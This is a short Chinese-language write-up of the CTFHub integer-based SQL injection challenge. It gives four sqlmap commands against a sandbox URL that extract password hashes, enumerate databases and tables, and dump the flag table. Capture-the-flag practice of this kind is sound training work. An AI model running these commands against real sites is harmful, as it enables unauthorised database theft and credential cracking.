【CTFHub】sql注入-整数型注入

题目：

图1. 题目截图

参考网站：

https://sqlmap.org/

主要的解题点：

1. 根据以往的知识，分析可以采用union的形式；
2. 但是还是要善用工具，使用sqlmap可以一步到位
   这里列明一些其中的关键步骤：
   其实本题只要按照sqlmap官网上给出的demo操作即可

• Step1：
  python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --password
  

  图1. 破译密码

• Step2:
  python sqlmap.py -u "http://challenge5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dbs

图2. databases情况

• Step3:
  python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli
  

  图3. tables情况

• Step4:
  python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli
  

  图4. 拖库